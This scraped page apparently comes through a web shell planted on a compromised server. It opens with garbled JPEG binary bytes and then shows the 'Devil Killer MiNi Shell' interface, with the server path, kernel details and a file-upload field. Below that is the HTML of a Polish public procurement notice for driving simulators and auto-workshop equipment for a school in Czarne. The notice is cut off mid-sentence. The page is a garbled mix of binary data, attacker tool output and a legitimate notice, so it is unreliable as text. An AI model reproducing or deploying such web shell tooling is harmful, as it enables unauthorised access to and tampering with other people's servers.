JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251016/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251016/0047862601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup, dostawa i montaż pomocy dydaktycznych, maszyn i urządzeń dla Warsztatów Szkolnych Samochodowych w Czarnem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT CZŁUCHOWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Wojska Polskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Człuchów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">77-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">starostwo@czluchow.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.powiatczluchowski.org.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup, dostawa i montaż pomocy dydaktycznych, maszyn i urządzeń dla Warsztatów Szkolnych Samochodowych w Czarnem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a8b676af-bdd6-49b8-bb51-3413ae2d20fa</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00478626</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00030601/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Poprawa jakości kształcenia zawodowego na terenie powiatu człuchowskiego poprzez modernizację i rozbudowę ZST w Człuchowie oraz ZSP w Czarnem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie dla Pomorza 2021-2027, Priorytetu 6. Fundusze europejskie dla silnego społecznie Pomorza (EFRR), Działania 6.2 Infrastruktura edukacji włączającej i zawodowej, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_czluchow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_czluchow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344).<br/>2. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/powiat_czluchow<br/>3. Rejestracja i korzystanie z Platformy zakupowej jest dla wykonawcy bezpłatne.<br/>4. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamawiającym a Wykonawcami,<br/>w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>5. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego.<br/>6. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>wykonawcy.<br/>7. Zgodnie z 67 ustawy Pzp, Zamawiający podaje wymagania techniczne związane z korzystaniem z platformazakupowa.pl.<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. Wykonawca może zwrócić się do<br/>zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>9. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania<br/>odpowiednio ofert, pod warunkiem że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed<br/>upływem terminu składania odpowiednio ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 96/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) zwanego dalej RODO), uprzejmie informujemy że:<br/>1)	Administratorem danych osobowych jest Starosta Powiatu Człuchowskiego <br/>2)	Kontakt z Inspektorem ochrony danych osobowych: adres e-mail iod@czluchow.org.pl; telefon 59 83 43 461 wew. 42;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. Zakup, dostawa i montaż pomocy dydaktycznych, maszyn i urządzeń dla Warsztatów Szkolnych Samochodowych w Czarnem.<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz art. 74 ustawy PZP;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza<br/>4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>b)	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.21.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Część nr 1 – Symulatory nauki jazdy<br/>a)	na kategorię B prawa jazdy – 3 szt; <br/>b)	na kategorię C prawa jazdy – 1 szt.<br/><br/>Przedmiot zamówienia będzie realizowany w miejscowości Czarne na potrzeby Warsztatów Szkolnych Samochodowych w Czarnem ul. Leśna 2a Zespołu Szkół Technicznych w Człuchowie, w ramach realizacji programu „Poprawa jakości kształcenia zawodowego na terenie Powiatu Człuchowskiego poprzez modernizację i rozbudowę Zespołu Szkół Technicznych w Człuchowie oraz Zespołu Szkół Ponadpodstawowych w Czarnem”.<br/>Przedmiot zamówienia został szczegółowo opisany w załączniku nr 1 do SWZ pn. Szczegółowy Opis Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34150000-3 - Symulatory</p> <p class="mb-0">51500000-7 - Usługi instalowania maszyn i urządzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów oddzielnie dla każdej części, w kryteriach, którym przypisano następujące znaczenie:<br/>1)	Cena (C) - waga 60%;<br/>2)	Termin wykonania ( T ) – 20 %;<br/>3)	Okres gwarancji na przedmiot zamówienia (G) – waga 10 %;<br/>4)	Parametry techniczne/ogólne ( PTO ) – waga 10 %.<br/>2.	Sposób oceny ofert:<br/>1)	Punkty za kryterium „ cena” będą obliczone wg poniższego wzoru:<br/>C = [(CN / CR) x 60%] x 100<br/>Wynik powyższego działania zostanie zaokrąglony do 2 miejsc po przecinku, gdzie:<br/>C – liczba punktów dla kryterium „cena”<br/>CN – najniższa oferowana cena, <br/>CR – cena oferty rozpatrywanej<br/>Cena oferty jest ceną brutto. <br/>2)	Punkty za kryterium „Termin wykonania” przedmiotu zamówienia, licząc od zawarcia umowy, przyznawane będą w poniższy sposób:<br/>a)	7 miesięcy – 0 pkt;<br/>b)	6 miesięcy – 2 pkt;<br/>c)	5 miesięcy – 5 pkt;<br/>d)	4 miesiące – 8 pkt;<br/>e)	3 miesiące – 10 pkt;<br/>f)	2 miesiące – 15 pkt;<br/>g)	1 miesiąc – 20 pkt.<br/>3)	Punkty za kryterium „Okres gwarancji” przyznawane będą za przedmiot zamówienia w poniższy sposób:<br/>a)	12 miesięcy gwarancji – 0 pkt,<br/>b)	24 miesiące gwarancji – 5 pkt.<br/>c)	36 miesięcy gwarancji – 10 pkt.<br/>W przypadku różnych okresów gwarancji proponowanych przez Wykonawcę dla przedmiotu zamówienia w tym samym pakiecie (części), Zamawiający dokona obliczenia ilości punktów wg średniej arytmetycznej okresu gwarancji - dla danego pakietu. <br/>4)	Punkty za kryterium „Parametry techniczne lub ogólne” przyznawane będą za przedmiot zamówienia w poniższy sposób:<br/> Parametry techniczne lub ogólne (ilość pkt. przyznana ofercie badanej)<br/> PTO = ------------------------------------------------------------------------------------------------- x 10 % x 100<br/> Parametry techniczne lub ogólne (max. ilość pkt możliwa do uzyskania w danej części)<br/>3.	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + T + G + PTO<br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Cena”,<br/>T – punkty uzyskane w kryterium „Termin wykonania”,<br/>G – punkty uzyskane w kryterium „Okres gwarancji na przedmiot zamówienia”,<br/>PTO - punkty uzyskane w kryterium „Parametry techniczne lub ogólne”.<br/>4.	Każda część zamówienia będzie oceniana oddzielnie wg ww. kryteriów.<br/>5.	Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę, oddzielnie dla każdej części.<br/>6.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>7.	Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert dokona wyboru oferty z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania ( T )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na przedmiot zamówienia (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne/ogólne ( PTO )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	Część nr 2 – Maszyny i urządzenia<br/>a)	Analizator spalin – 1 szt;<br/>b)	Dymomierz – 1 szt;<br/>c)	Urządzenie do pomiaru geometrii kół – 1 szt;<br/>d)	Podnośnik dwukolumnowy – 2 szt;<br/>e)	Podnośnik nożycowy – 1 szt;<br/>f)	Montażownica – 1 szt;<br/>g)	Wyważarka kół – 1 szt.<br/><br/>Przedmiot zamówienia będzie realizowany w miejscowości Czarne na potrzeby Warsztatów Szkolnych Samochodowych w Czarnem ul. Leśna 2a Zespołu Szkół Technicznych w Człuchowie, w ramach realizacji programu „Poprawa jakości kształcenia zawodowego na terenie Powiatu Człuchowskiego poprzez modernizację i rozbudowę Zespołu Szkół Technicznych w Człuchowie oraz Zespołu Szkół Ponadpodstawowych w Czarnem”.<br/>Przedmiot zamówienia został szczegółowo opisany w załączniku nr 1 do SWZ pn. Szczegółowy Opis Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31720000-9 - Urządzenia elektromechaniczne</p> <p class="mb-0">51500000-7 - Usługi instalowania maszyn i urządzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów oddzielnie dla każdej części, w kryteriach, którym przypisano następujące znaczenie:<br/>1)	Cena (C) - waga 60%;<br/>2)	Termin wykonania ( T ) – 20 %;<br/>3)	Okres gwarancji na przedmiot zamówienia (G) – waga 10 %;<br/>4)	Parametry techniczne/ogólne ( PTO ) – waga 10 %.<br/>2.	Sposób oceny ofert:<br/>1)	Punkty za kryterium „ cena” będą obliczone wg poniższego wzoru:<br/>C = [(CN / CR) x 60%] x 100<br/>Wynik powyższego działania zostanie zaokrąglony do 2 miejsc po przecinku, gdzie:<br/>C – liczba punktów dla kryterium „cena”<br/>CN – najniższa oferowana cena, <br/>CR – cena oferty rozpatrywanej<br/>Cena oferty jest ceną brutto. <br/>2)	Punkty za kryterium 